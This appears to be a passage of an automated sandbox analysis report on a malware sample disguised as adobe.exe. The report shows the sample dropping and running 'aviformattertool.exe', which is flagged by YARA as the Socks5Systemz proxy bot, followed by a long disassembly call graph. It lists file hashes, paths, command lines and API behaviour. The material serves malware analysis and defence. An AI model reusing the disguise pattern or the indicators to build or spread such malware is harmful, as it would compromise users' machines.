                                                                                                                                                        Jan 13, 2024 06:34:01.729543924 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:34:01 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:06:31:55
                                                                                                                                                        Start date:13/01/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\adobe.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\Desktop\adobe.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:4'855'286 bytes
                                                                                                                                                        MD5 hash:E9A2997EE4CFB48CB3988F3048E041E9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:1
                                                                                                                                                        Start time:06:31:55
                                                                                                                                                        Start date:13/01/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp" /SL5="$20466,4603715,54272,C:\Users\user\Desktop\adobe.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:704'512 bytes
                                                                                                                                                        MD5 hash:EAF0354C6EA59246416F73EC28FB11AF
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:06:31:56
                                                                                                                                                        Start date:13/01/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -i
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'757'184 bytes
                                                                                                                                                        MD5 hash:354540FAD1E406C119F19FC2499E892C
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:06:31:56
                                                                                                                                                        Start date:13/01/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -s
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'757'184 bytes
                                                                                                                                                        MD5 hash:354540FAD1E406C119F19FC2499E892C
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2904685361.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:21.4%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:2.5%
                                                                                                                                                          Total number of Nodes:1461
                                                                                                                                                          Total number of Limit Nodes:18
                                                                                                                                                          execution_graph 4988 409c40 5029 4030dc 4988->5029 4990 409c56 5032 4042e8 4990->5032 4992 409c5b 5035 40457c GetModuleHandleA GetProcAddress 4992->5035 4998 409c6a 5052 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4998->5052 5015 409d43 5114 4074a0 5015->5114 5017 409d05 5017->5015 5147 409aa0 5017->5147 5018 409d84 5118 407a28 5018->5118 5019 409d69 5019->5018 5020 409aa0 18 API calls 5019->5020 5020->5018 5022 409da9 5128 408b08 5022->5128 5026 409def 5027 408b08 35 API calls 5026->5027 5028 409e28 5026->5028 5027->5026 5157 403094 5029->5157 5031 4030e1 GetModuleHandleA GetCommandLineA 5031->4990 5034 404323 5032->5034 5158 403154 5032->5158 5034->4992 5036 404598 5035->5036 5037 40459f GetProcAddress 5035->5037 5036->5037 5038 4045b5 GetProcAddress 5037->5038 5039 4045ae 5037->5039 5040 4045c4 SetProcessDEPPolicy 5038->5040 5041 4045c8 5038->5041 5039->5038 5040->5041 5042 4065b8 5041->5042 5171 405c98 5042->5171 5051 406604 6F571CD0 5051->4998 5053 4090f7 5052->5053 5333 406fa0 SetErrorMode 5053->5333 5058 403198 4 API calls 5059 40913c 5058->5059 5060 409b30 GetSystemInfo VirtualQuery 5059->5060 5061 409be4 5060->5061 5064 409b5a 5060->5064 5066 409768 5061->5066 5062 409bc5 VirtualQuery 5062->5061 5062->5064 5063 409b84 VirtualProtect 5063->5064 5064->5061 5064->5062 5064->5063 5065 409bb3 VirtualProtect 5064->5065 5065->5062 5343 406bd0 GetCommandLineA 5066->5343 5068 409825 5070 4031b8 4 API calls 5068->5070 5069 406c2c 20 API calls 5073 409785 5069->5073 5071 40983f 5070->5071 5074 406c2c 5071->5074 5072 403454 18 API calls 5072->5073 5073->5068 5073->5069 5073->5072 5075 406c53 GetModuleFileNameA 5074->5075 5076 406c77 GetCommandLineA 5074->5076 5077 403278 18 API calls 5075->5077 5084 406c7c 5076->5084 5078 406c75 5077->5078 5082 406ca4 5078->5082 5079 406c81 5080 403198 4 API calls 5079->5080 5083 406c89 5080->5083 5081 406af0 18 API calls 5081->5084 5085 403198 4 API calls 5082->5085 5086 40322c 4 API calls 5083->5086 5084->5079 5084->5081 5084->5083 5087 406cb9 5085->5087 5086->5082 5088 4031e8 5087->5088 5090 4031ec 5088->5090 5092 4031fc 5088->5092 5089 403228 5094 4074e0 5089->5094 5091 403254 18 API calls 5090->5091 5090->5092 5091->5092 5092->5089 5093 4025ac 4 API calls 5092->5093 5093->5089 5095 4074ea 5094->5095 5364 407576 5095->5364 5367 407578 5095->5367 5096 407516 5097 40752a 5096->5097 5370 40748c GetLastError 5096->5370 5101 409bec FindResourceA 5097->5101 5102 409c01 5101->5102 5103 409c06 SizeofResource 5101->5103 5104 409aa0 18 API calls 5102->5104 5105 409c13 5103->5105 5106 409c18 LoadResource 5103->5106 5104->5103 5107 409aa0 18 API calls 5105->5107 5108 409c26 5106->5108 5109 409c2b LockResource 5106->5109 5107->5106 5112 409aa0 18 API calls 5108->5112 5110 409c37 5109->5110 5111 409c3c 5109->5111 5113 409aa0 18 API calls 5110->5113 5111->5017 5144 407918 5111->5144 5112->5109 5113->5111 5115 4074b4 5114->5115 5116 4074c4 5115->5116 5117 4073ec 34 API calls 5115->5117 5116->5019 5117->5116 5119 407a35 5118->5119 5120 405880 18 API calls 5119->5120 5121 407a89 5119->5121 5120->5121 5122 407918 InterlockedExchange 5121->5122 5123 407a9b 5122->5123 5124 405880 18 API calls 5123->5124 5125 407ab1 5123->5125 5124->5125 5126 407af4 5125->5126 5127 405880 18 API calls 5125->5127 5126->5022 5127->5126 5132 408b39 5128->5132 5135 408b82 5128->5135 5129 408bcd 5478 407cb8 5129->5478 5131 407cb8 35 API calls 5131->5135 5132->5135 5138 403420 18 API calls 5132->5138 5139 4031e8 18 API calls 5132->5139 5143 407cb8 35 API calls 5132->5143 5469 4034f0 5132->5469 5134 408be4 5137 4031b8 4 API calls 5134->5137 5135->5129 5135->5131 5136 4034f0 18 API calls 5135->5136 5141 403420 18 API calls 5135->5141 5142 4031e8 18 API calls 5135->5142 5136->5135 5140 408bfe 5137->5140 5138->5132 5139->5132 5154 404c10 5140->5154 5141->5135 5142->5135 5143->5132 5504 4078c4 5144->5504 5148 409ac1 5147->5148 5149 409aa9 5147->5149 5151 405880 18 API calls 5148->5151 5150 405880 18 API calls 5149->5150 5152 409abb 5150->5152 5153 409ad2 5151->5153 5152->5015 5153->5015 5155 402594 18 API calls 5154->5155 5156 404c1b 5155->5156 5156->5026 5157->5031 5159 403164 5158->5159 5160 40318c TlsGetValue 5158->5160 5159->5034 5161 403196 5160->5161 5162 40316f 5160->5162 5161->5034 5166 40310c 5162->5166 5164 403174 TlsGetValue 5165 403184 5164->5165 5165->5034 5167 403120 LocalAlloc 5166->5167 5168 403116 5166->5168 5169 403132 5167->5169 5170 40313e TlsSetValue 5167->5170 5168->5167 5169->5164 5170->5169 5243 405930 5171->5243 5174 405270 GetSystemDefaultLCID 5178 4052a6 5174->5178 5175 404ccc 19 API calls 5175->5178 5176 4051fc 19 API calls 5176->5178 5177 4031e8 18 API calls 5177->5178 5178->5175 5178->5176 5178->5177 5182 405308 5178->5182 5179 404ccc 19 API calls 5179->5182 5180 4051fc 19 API calls 5180->5182 5181 4031e8 18 API calls 5181->5182 5182->5179 5182->5180 5182->5181 5183 40538b 5182->5183 5311 4031b8 5183->5311 5186 4053b4 GetSystemDefaultLCID 5315 4051fc GetLocaleInfoA 5186->5315 5189 4031e8 18 API calls 5190 4053f4 5189->5190 5191 4051fc 19 API calls 5190->5191 5192 405409 5191->5192 5193 4051fc 19 API calls 5192->5193 5194 40542d 5193->5194 5321 405248 GetLocaleInfoA 5194->5321 5197 405248 GetLocaleInfoA 5198 40545d 5197->5198 5199 4051fc 19 API calls 5198->5199 5200 405477 5199->5200 5201 405248 GetLocaleInfoA 5200->5201 5202 405494 5201->5202 5203 4051fc 19 API calls 5202->5203 5204 4054ae 5203->5204 5205 4031e8 18 API calls 5204->5205 5206 4054bb 5205->5206 5207 4051fc 19 API calls 5206->5207 5208 4054d0 5207->5208 5209 4031e8 18 API calls 5208->5209 5210 4054dd 5209->5210 5211 405248 GetLocaleInfoA 5210->5211 5212 4054eb 5211->5212 5213 4051fc 19 API calls 5212->5213 5214 405505 5213->5214 5215 4031e8 18 API calls 5214->5215 5216 405512 5215->5216 5217 4051fc 19 API calls 5216->5217 5218 405527 5217->5218 5219 4031e8 18 API calls 5218->5219 5220 405534 5219->5220 5221 4051fc 19 API calls 5220->5221 5222 405549 5221->5222 5223 405566 5222->5223 5224 405557 5222->5224 5226 40322c 4 API calls 5223->5226 5329 40322c 5224->5329 5227 405564 5226->5227 5228 4051fc 19 API calls 5227->5228 5229 405588 5228->5229 5230 4055a5 5229->5230 5231 405596 5229->5231 5233 403198 4 API calls 5230->5233 5232 40322c 4 API calls 5231->5232 5234 4055a3 5232->5234 5233->5234 5323 4033b4 5234->5323 5236 4055c7 5237 4033b4 18 API calls 5236->5237 5238 4055e1 5237->5238 5239 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5238->5239 5240 4055fb 5239->5240 5241 405ce4 GetVersionExA 5240->5241 5242 405cfb 5241->5242 5242->5051 5244 40593c 5243->5244 5251 404ccc LoadStringA 5244->5251 5247 4031e8 18 API calls 5248 40596d 5247->5248 5254 403198 5248->5254 5258 403278 5251->5258 5255 4031b7 5254->5255 5256 40319e 5254->5256 5255->5174 5256->5255 5307 4025ac 5256->5307 5263 403254 5258->5263 5260 403288 5261 403198 4 API calls 5260->5261 5262 4032a0 5261->5262 5262->5247 5264 403274 5263->5264 5265 403258 5263->5265 5264->5260 5268 402594 5265->5268 5269 402598 5268->5269 5272 4025a2 5268->5272 5274 401fd4 5269->5274 5270 40259e 5271 403154 4 API calls 5270->5271 5270->5272 5271->5272 5272->5260 5275 401fe8 5274->5275 5276 401fed 5274->5276 5285 401918 RtlInitializeCriticalSection 5275->5285 5278 402012 RtlEnterCriticalSection 5276->5278 5279 40201c 5276->5279 5282 401ff1 5276->5282 5278->5279 5279->5282 5292 401ee0 5279->5292 5282->5270 5283 402147 5283->5270 5284 40213d RtlLeaveCriticalSection 5284->5283 5286 401946 5285->5286 5287 40193c RtlEnterCriticalSection 5285->5287 5288 401964 LocalAlloc 5286->5288 5287->5286 5289 40197e 5288->5289 5290 4019c3 RtlLeaveCriticalSection 5289->5290 5291 4019cd 5289->5291 5290->5291 5291->5276 5295 401ef0 5292->5295 5293 401f1c 5297 401f40 5293->5297 5303 401d00 5293->5303 5295->5293 5295->5297 5298 401e58 5295->5298 5297->5283 5297->5284 5299 4016d8 LocalAlloc VirtualAlloc VirtualFree VirtualFree VirtualAlloc 5298->5299 5300 401e68 5299->5300 5301 401e75 5300->5301 5302 401dcc 9 API calls 5300->5302 5301->5295 5302->5301 5304 401d4e 5303->5304 5305 401d1e 5303->5305 5304->5305 5306 401c68 9 API calls 5304->5306 5305->5297 5306->5305 5308 4025b0 5307->5308 5309 4025ba 5307->5309 5308->5309 5310 403154 4 API calls 5308->5310 5309->5255 5309->5309 5310->5309 5312 4031be 5311->5312 5313 4031e3 5312->5313 5314 4025ac 4 API calls 5312->5314 5313->5186 5314->5312 5316 405223 5315->5316 5317 405235 5315->5317 5318 403278 18 API calls 5316->5318 5319 40322c 4 API calls 5317->5319 5320 405233 5318->5320 5319->5320 5320->5189 5322 405264 5321->5322 5322->5197 5324 4033bc 5323->5324 5325 403254 18 API calls 5324->5325 5326 4033cf 5325->5326 5327 4031e8 18 API calls 5326->5327 5328 4033f7 5327->5328 5331 403230 5329->5331 5330 403252 5330->5227 5331->5330 5332 4025ac 4 API calls 5331->5332 5332->5330 5341 403414 5333->5341 5336 406fee 5337 407284 FormatMessageA 5336->5337 5338 4072aa 5337->5338 5339 403278 18 API calls 5338->5339 5340 4072c7 5339->5340 5340->5058 5342 403418 LoadLibraryA 5341->5342 5342->5336 5350 406af0 5343->5350 5345 406bf3 5346 406c05 5345->5346 5347 406af0 18 API calls 5345->5347 5348 403198 4 API calls 5346->5348 5347->5345 5349 406c1a 5348->5349 5349->5073 5351 406b1c 5350->5351 5352 403278 18 API calls 5351->5352 5353 406b29 5352->5353 5360 403420 5353->5360 5355 406b31 5356 4031e8 18 API calls 5355->5356 5357 406b49 5356->5357 5358 403198 4 API calls 5357->5358 5359 406b6b 5358->5359 5359->5345 5361 403426 5360->5361 5363 403437 5360->5363 5362 403254 18 API calls 5361->5362 5361->5363 5362->5363 5363->5355 5365 407578 5364->5365 5366 4075b7 CreateFileA 5365->5366 5366->5096 5368 403414 5367->5368 5369 4075b7 CreateFileA 5368->5369 5369->5096 5373 4073ec 5370->5373 5374 407284 19 API calls 5373->5374 5375 407414 5374->5375 5376 407434 5375->5376 5382 405184 5375->5382 5385 405880 5376->5385 5379 407443 5380 403198 4 API calls 5379->5380 5381 407460 5380->5381 5381->5097 5389 405198 5382->5389 5386 405887 5385->5386 5387 4031e8 18 API calls 5386->5387 5388 40589f 5387->5388 5388->5379 5390 4051b5 5389->5390 5397 404e48 5390->5397 5393 4051e1 5395 403278 18 API calls 5393->5395 5396 405193 5395->5396 5396->5376 5400 404e63 5397->5400 5398 404e75 5398->5393 5402 404bd4 5398->5402 5400->5398 5405 404f6a 5400->5405 5412 404e3c 5400->5412 5403 405930 19 API calls 5402->5403 5404 404be5 5403->5404 5404->5393 5406 404f7b 5405->5406 5409 404fc9 5405->5409 5408 40504f 5406->5408 5406->5409 5411 404fe7 5408->5411 5419 404e28 5408->5419 5409->5411 5415 404de4 5409->5415 5411->5400 5413 403198 4 API calls 5412->5413 5414 404e46 5413->5414 5414->5400 5416 404df2 5415->5416 5422 404bec 5416->5422 5418 404e20 5418->5409 5435 4039a4 5419->5435 5425 4059a0 5422->5425 5424 404c05 5424->5418 5426 4059ae 5425->5426 5427 404ccc 19 API calls 5426->5427 5428 4059d8 5427->5428 5429 405184 33 API calls 5428->5429 5430 4059e6 5429->5430 5431 4031e8 18 API calls 5430->5431 5432 4059f1 5431->5432 5433 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5432->5433 5434 405a0b 5433->5434 5434->5424 5436 4039ab 5435->5436 5441 4038b4 5436->5441 5438 4039cb 5439 403198 4 API calls 5438->5439 5440 4039d2 5439->5440 5440->5411 5442 4038d5 5441->5442 5443 4038c8 5441->5443 5444 403934 5442->5444 5445 4038db 5442->5445 5446 403780 6 API calls 5443->5446 5449 403993 5444->5449 5450 40393b 5444->5450 5447 4038e1 5445->5447 5448 4038ee 5445->5448 5451 4038d0 5446->5451 5452 403894 6 API calls 5447->5452 5453 403894 6 API calls 5448->5453 5454 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5449->5454 5455 403941 5450->5455 5456 40394b 5450->5456 5451->5438 5452->5451 5459 4038fc 5453->5459 5454->5451 5457 403864 23 API calls 5455->5457 5458 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5456->5458 5457->5451 5460 40395d 5458->5460 5461 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5459->5461 5462 403864 23 API calls 5460->5462 5463 403917 5461->5463 5464 403976 5462->5464 5465 40374c VariantClear 5463->5465 5466 40374c VariantClear 5464->5466 5467 40392c 5465->5467 5468 40398b 5466->5468 5467->5438 5468->5438 5470 4034fd 5469->5470 5476 40352d 5469->5476 5471 403526 5470->5471 5473 403509 5470->5473 5474 403254 18 API calls 5471->5474 5472 403198 4 API calls 5477 403517 5472->5477 5484 4025c4 5473->5484 5474->5476 5476->5472 5477->5132 5479 407cd3 5478->5479 5482 407cc8 5478->5482 5488 407c5c 5479->5488 5482->5134 5483 405880 18 API calls 5483->5482 5486 4025ca 5484->5486 5485 4025dc 5485->5477 5486->5485 5487 403154 4 API calls 5486->5487 5487->5485 5489 407c70 5488->5489 5490 407caf 5488->5490 5489->5490 5492 407bac 5489->5492 5490->5482 5490->5483 5493 407bb7 5492->5493 5494 407bc8 5492->5494 5495 405880 18 API calls 5493->5495 5496 4074a0 34 API calls 5494->5496 5495->5494 5497 407bdc 5496->5497 5498 4074a0 34 API calls 5497->5498 5499 407bfd 5498->5499 5500 407918 InterlockedExchange 5499->5500 5501 407c12 5500->5501 5502 407c28 5501->5502 5503 405880 18 API calls 5501->5503 5502->5489 5503->5502 5505 4078d6 5504->5505 5506 4078e7 5504->5506 5507 4078db InterlockedExchange 5505->5507 5506->5017 5507->5506 6098 409e47 6099 409e6c 6098->6099 6100 4098f4 29 API calls 6099->6100 6104 409e71 6100->6104 6101 409ec4 6132 4026c4 GetSystemTime 6101->6132 6103 409ec9 6105 409330 46 API calls 6103->6105 6104->6101 6107 408dd8 18 API calls 6104->6107 6106 409ed1 6105->6106 6108 4031e8 18 API calls 6106->6108 6109 409ea0 6107->6109 6110 409ede 6108->6110 6112 409ea8 MessageBoxA 6109->6112 6111 406928 19 API calls 6110->6111 6113 409eeb 6111->6113 6112->6101 6114 409eb5 6112->6114 6115 4066c0 19 API calls 6113->6115 6116 405854 19 API calls 6114->6116 6117 409efb 6115->6117 6116->6101 6118 406638 19 API calls 6117->6118 6119 409f0c 6118->6119 6120 403340 18 API calls 6119->6120 6121 409f1a 6120->6121 6122 4031e8 18 API calls 6121->6122 6123 409f2a 6122->6123 6124 4074e0 37 API calls 6123->6124 6125 409f69 6124->6125 6126 402594 18 API calls 6125->6126 6127 409f89 6126->6127 6128 407a28 19 API calls 6127->6128 6129 409fcb 6128->6129 6130 407cb8 35 API calls 6129->6130 6131 409ff2 6130->6131 6132->6103 6059 407548 6060 407554 CloseHandle 6059->6060 6061 40755d 6059->6061 6060->6061 6603 402b48 RaiseException 6062 407749 6063 4076dc WriteFile 6062->6063 6069 407724 6062->6069 6064 4076e8 6063->6064 6065 4076ef 6063->6065 6067 40748c 35 API calls 6064->6067 6066 407700 6065->6066 6068 4073ec 34 API calls 6065->6068 6067->6065 6068->6066 6069->6062 6070 4077e0 6069->6070 6071 4078db InterlockedExchange 6070->6071 6073 407890 6070->6073 6072 4078e7 6071->6072 6604 40294a 6607 402952 6604->6607 6605 403554 4 API calls 6605->6607 6606 402967 6607->6605 6607->6606 6608 403f4a 6609 403f53 6608->6609 6610 403f5c 6608->6610 6612 403f07 6609->6612 6615 403f09 6612->6615 6614 403f3c 6614->6610 6616 403154 4 API calls 6615->6616 6618 403e9c 6615->6618 6622 403f3d 6615->6622 6635 403e9c 6615->6635 6616->6615 6617 403ef2 6620 402674 4 API calls 6617->6620 6618->6614 6618->6617 6621 403ea9 6618->6621 6626 403e8e 6618->6626 6624 403ecf 6620->6624 6621->6624 6625 402674 4 API calls 6621->6625 6622->6610 6624->6610 6625->6624 6627 403e4c 6626->6627 6628 403e62 6627->6628 6629 403e7b 6627->6629 6632 403e67 6627->6632 6631 403cc8 4 API calls 6628->6631 6630 402674 4 API calls 6629->6630 6633 403e78 6630->6633 6631->6632 6632->6633 6634 402674 4 API calls 6632->6634 6633->6617 6633->6621 6634->6633 6636 403ed7 6635->6636 6642 403ea9 6635->6642 6638 403ef2 6636->6638 6639 403e8e 4 API calls 6636->6639 6637 403ecf 6637->6615 6640 402674 4 API calls 6638->6640 6641 403ee6 6639->6641 6640->6637 6641->6638 6641->6642 6642->6637 6643 402674 4 API calls 6642->6643 6643->6637 6652 405150 6653 405163 6652->6653 6654 404e48 33 API calls 6653->6654 6655 405177 6654->6655 6133 403a52 6134 403a74 6133->6134 6135 403a5a WriteFile 6133->6135 6135->6134 6136 403a78 GetLastError 6135->6136 6136->6134 6137 402654 6138 403154 4 API calls 6137->6138 6140 402614 6138->6140 6139 402632 6139->6139 6140->6139 6141 403154 4 API calls 6140->6141 6141->6139 5508 409e62 5509 409aa0 18 API calls 5508->5509 5510 409e67 5509->5510 5511 409e6c 5510->5511 5611 402f24 5510->5611 5545 4098f4 5511->5545 5514 409ec4 5550 4026c4 GetSystemTime 5514->5550 5516 409ec9 5551 409330 5516->5551 5517 409e71 5517->5514 5616 408dd8 5517->5616 5521 4031e8 18 API calls 5523 409ede 5521->5523 5522 409ea0 5525 409ea8 MessageBoxA 5522->5525 5569 406928 5523->5569 5525->5514 5527 409eb5 5525->5527 5619 405854 5527->5619 5532 409f0c 5596 403340 5532->5596 5534 409f1a 5535 4031e8 18 API calls 5534->5535 5536 409f2a 5535->5536 5537 4074e0 37 API calls 5536->5537 5538 409f69 5537->5538 5539 402594 18 API calls 5538->5539 5540 409f89 5539->5540 5541 407a28 19 API calls 5540->5541 5542 409fcb 5541->5542 5543 407cb8 35 API calls 5542->5543 5544 409ff2 5543->5544 5623 40953c 5545->5623 5550->5516 5554 409350 5551->5554 5555 409375 CreateDirectoryA 5554->5555 5560 408dd8 18 API calls 5554->5560 5565 407284 19 API calls 5554->5565 5568 405880 18 API calls 5554->5568 5715 406cf4 5554->5715 5738 409224 5554->5738 5757 404c84 5554->5757 5760 408da8 5554->5760 5556 4093ed 5555->5556 5557 40937f GetLastError 5555->5557 5558 40322c 4 API calls 5556->5558 5557->5554 5559 4093f7 5558->5559 5561 4031b8 4 API calls 5559->5561 5560->5554 5563 409411 5561->5563 5564 4031b8 4 API calls 5563->5564 5566 40941e 5564->5566 5565->5554 5566->5521 5568->5554 5870 406820 5569->5870 5572 403454 18 API calls 5573 40694a 5572->5573 5574 4066c0 5573->5574 5875 4068e4 5574->5875 5577 4066f0 5579 403340 18 API calls 5577->5579 5578 4066fe 5580 403454 18 API calls 5578->5580 5582 4066fc 5579->5582 5581 406711 5580->5581 5583 403340 18 API calls 5581->5583 5584 403198 4 API calls 5582->5584 5583->5582 5585 406733 5584->5585 5586 406638 5585->5586 5587 406642 5586->5587 5588 406665 5586->5588 5881 406950 5587->5881 5589 40322c 4 API calls 5588->5589 5591 40666e 5589->5591 5591->5532 5592 406649 5592->5588 5593 406654 5592->5593 5594 403340 18 API calls 5593->5594 5595 406662 5594->5595 5595->5532 5597 403344 5596->5597 5598 4033a5 5596->5598 5599 40334c 5597->5599 5601 4031e8 5597->5601 5599->5598 5602 4031e8 18 API calls 5599->5602 5605 40335b 5599->5605 5600 403228 5600->5534 5604 403254 18 API calls 5601->5604 5606 4031fc 5601->5606 5602->5605 5603 403254 18 API calls 5608 403375 5603->5608 5604->5606 5605->5603 5606->5600 5607 4025ac 4 API calls 5606->5607 5607->5600 5609 4031e8 18 API calls 5608->5609 5610 4033a1 5609->5610 5610->5534 5612 403154 4 API calls 5611->5612 5613 402f29 5612->5613 5887 402bcc 5613->5887 5615 402f51 5615->5615 5617 408da8 18 API calls 5616->5617 5618 408df4 5617->5618 5618->5522 5620 405859 5619->5620 5621 405930 19 API calls 5620->5621 5622 40586b 5621->5622 5622->5622 5629 40955b 5623->5629 5624 409590 5626 40959d GetUserDefaultLangID 5624->5626 5631 409592 5624->5631 5625 409594 5641 407024 GetModuleHandleA GetProcAddress 5625->5641 5626->5631 5629->5624 5629->5625 5630 40956f 5629->5630 5635 409884 5630->5635 5631->5630 5632 4095cb GetACP 5631->5632 5633 4095ef 5631->5633 5632->5630 5632->5631 5633->5630 5634 409615 GetACP 5633->5634 5634->5630 5634->5633 5636 40988c 5635->5636 5640 4098c6 5635->5640 5637 403420 18 API calls 5636->5637 5636->5640 5638 4098c0 5637->5638 5699 408e80 5638->5699 5640->5517 5642 407067 5641->5642 5643 40705e 5641->5643 5644 407070 5642->5644 5645 4070a8 5642->5645 5654 403198 4 API calls 5643->5654 5662 406f68 5644->5662 5647 406f68 RegOpenKeyExA 5645->5647 5648 4070c1 5647->5648 5650 4070de 5648->5650 5651 406f5c 20 API calls 5648->5651 5649 407089 5649->5650 5665 406f5c 5649->5665 5652 40322c 4 API calls 5650->5652 5655 4070d5 RegCloseKey 5651->5655 5656 4070eb 5652->5656 5658 407120 5654->5658 5655->5650 5668 4032fc 5656->5668 5659 403198 4 API calls 5658->5659 5661 407128 5659->5661 5661->5631 5663 406f73 5662->5663 5664 406f79 RegOpenKeyExA 5662->5664 5663->5664 5664->5649 5682 406e10 5665->5682 5669 403300 5668->5669 5670 40333f 5668->5670 5671 40330a 5669->5671 5677 4031e8 5669->5677 5670->5643 5672 403334 5671->5672 5673 40331d 5671->5673 5676 4034f0 18 API calls 5672->5676 5674 4034f0 18 API calls 5673->5674 5681 403322 5674->5681 5675 403228 5675->5643 5676->5681 5678 403254 18 API calls 5677->5678 5679 4031fc 5677->5679 5678->5679 5679->5675 5680 4025ac 4 API calls 5679->5680 5680->5675 5681->5643 5683 406e36 RegQueryValueExA 5682->5683 5684 406e7b 5683->5684 5689 406e59 5683->5689 5686 403198 4 API calls 5684->5686 5685 406e73 5687 403198 4 API calls 5685->5687 5688 406f47 RegCloseKey 5686->5688 5687->5684 5688->5650 5689->5684 5689->5685 5690 403278 18 API calls 5689->5690 5691 403420 18 API calls 5689->5691 5690->5689 5692 406eb0 RegQueryValueExA 5691->5692 5692->5683 5693 406ecc 5692->5693 5693->5684 5694 4034f0 18 API calls 5693->5694 5695 406f0e 5694->5695 5696 406f20 5695->5696 5698 403420 18 API calls 5695->5698 5697 4031e8 18 API calls 5696->5697 5697->5684 5698->5696 5700 408e8e 5699->5700 5702 408ea6 5700->5702 5712 408e18 5700->5712 5703 408e18 18 API calls 5702->5703 5704 408eca 5702->5704 5703->5704 5705 407918 InterlockedExchange 5704->5705 5706 408ee5 5705->5706 5707 408e18 18 API calls 5706->5707 5708 408ef8 5706->5708 5707->5708 5709 408e18 18 API calls 5708->5709 5710 403278 18 API calls 5708->5710 5711 408f27 5708->5711 5709->5708 5710->5708 5711->5640 5713 405880 18 API calls 5712->5713 5714 408e29 5713->5714 5714->5702 5764 406a58 5715->5764 5718 406d26 5720 406a58 19 API calls 5718->5720 5722 406d72 5718->5722 5721 406d36 5720->5721 5723 406d42 5721->5723 5725 406a34 21 API calls 5721->5725 5772 406888 5722->5772 5723->5722 5726 406a58 19 API calls 5723->5726 5735 406d67 5723->5735 5725->5723 5729 406d5b 5726->5729 5732 406a34 21 API calls 5729->5732 5729->5735 5730 406638 19 API calls 5731 406d87 5730->5731 5733 40322c 4 API calls 5731->5733 5732->5735 5734 406d91 5733->5734 5736 4031b8 4 API calls 5734->5736 5735->5722 5784 406cc8 GetWindowsDirectoryA 5735->5784 5737 406dab 5736->5737 5737->5554 5739 409244 5738->5739 5740 406638 19 API calls 5739->5740 5741 40925d 5740->5741 5742 40322c 4 API calls 5741->5742 5749 409268 5742->5749 5743 406978 20 API calls 5743->5749 5745 4033b4 18 API calls 5745->5749 5746 408dd8 18 API calls 5746->5749 5748 405880 18 API calls 5748->5749 5749->5743 5749->5745 5749->5746 5749->5748 5750 4092e4 5749->5750 5824 4091b0 5749->5824 5832 409034 5749->5832 5751 40322c 4 API calls 5750->5751 5752 4092ef 5751->5752 5753 4031b8 4 API calls 